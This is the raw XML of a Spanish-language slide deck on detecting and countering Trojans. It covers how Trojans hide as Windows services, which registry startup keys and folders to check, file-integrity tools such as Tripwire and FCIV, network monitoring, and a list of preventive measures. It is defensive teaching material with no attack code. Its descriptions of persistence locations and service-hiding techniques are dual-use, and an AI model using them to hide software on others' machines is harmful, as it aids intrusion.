              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Permite a los atacantes generar servicios de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>permitiéndoles tener control remoto sobre el equipo de la víctima y pasar instrucciones maliciosas. Los troyanos renombran sus procesos para parecer servicios originales de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de esa manera impedir detección.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los troyanos emplean técnicas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> para manipular HKEY_LOCAL_MACHINE\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> para esconder sus procesos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Herramientas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>SrvMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2914219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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Escaneando programas sospechosos de inicio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Primero revisar la carpeta Inicio para ver accesos directos de los programas que se inician automáticamente. Revisar los servicios de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>que se inician automáticamente. Revisar los programas de inicio en el registro. Revisar controladores que se cargan automáticamente. Revisar el inicio del Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107839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sz="2400" dirty="0"/>
              <a:t>Entradas del registro con relación al inicio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Explorer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Setting</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>\Explorer\Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Folders, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>\Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Shell Folders, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>\Explorer\Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Folders, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>\Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Shell Folders, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows NT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>\Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315661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smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Setting</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>HKCU\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>HKCU\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79457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a:t>IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Setting</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\Software\Microsoft\Internet Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>UrlSearchHooks</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\Software\Microsoft\Internet Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Toolbar</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKLM\Software\Microsoft\Internet Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HKCU\Software\Microsoft\Internet Explorer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>MenuExt</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129410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smtClean="0"/>
              <a:t>Herramientas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starter, Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AutoRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, What's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? 2.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411496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Generalmente busca información sobre: tarjetas de crédito, cuentas, documentos confidenciales, datos financieros, calendario, utilizar el equipo infectado para propósitos ilegales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Su propósito</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56269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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>7. Escaneando archivos y carpetas sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los troyanos normalmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>modificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>los archivos y carpetas del sistema. Utilice estas herramientas para detectar los cambios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>WinMD5 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1522570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sz="2600" dirty="0" smtClean="0"/>
              <a:t>FCIV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: Es una aplicación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>línea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de comandos que computa los hashes (MD5 o SHA1) de los archivos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Tripwire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: Sistema de clase empresarial verificador de integridad que escanea y reporta archivos del sistema críticos cambiados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Sigverif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: Revisa la integridad de los archivos críticos que son firmados digitalmente por Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otras herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>FastSu</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="949520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Como detectar Troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Escaneando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>actividades de red sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Se debe revisar puertos, tanto puertos no permitidos o comunes, como permitidos o comunes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La herramienta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Analyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> es una herramienta intuitiva, que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>provee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>información detallada para ayudar a revisar si hay actividades troyanas en la red.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3638709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Contramedidas para los troyanos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Evitar descargar y ejecutar aplicaciones de fuentes no confiadas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Evitar abrir archivos adjuntos por mail de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>remitentes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>no conocidos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Instalar parches de seguridad y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>actualizaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>para los S.O. y aplicaciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Escanear CDS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DVDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, Discos, USB con antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217706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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Evitar aceptar programas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>transferidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>por programas de mensajería.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Bloquear puertos innecesarios en el equipo y firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Fortalecer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>las configuraciones débiles por defecto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>8. Deshabilitar funcionalidades que no se utilizan, incluyendo protocolos y servicios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>9. Evitar ejecutar aplicaciones, scripts, etc. a ciegas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2815148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10. Monitorear el tráfico interno de la red de puertos extraños o tráfico encriptado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>11. Administrar los archivos de integridad del sistema realizando revisiones, auditorías y escaneo de puertos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
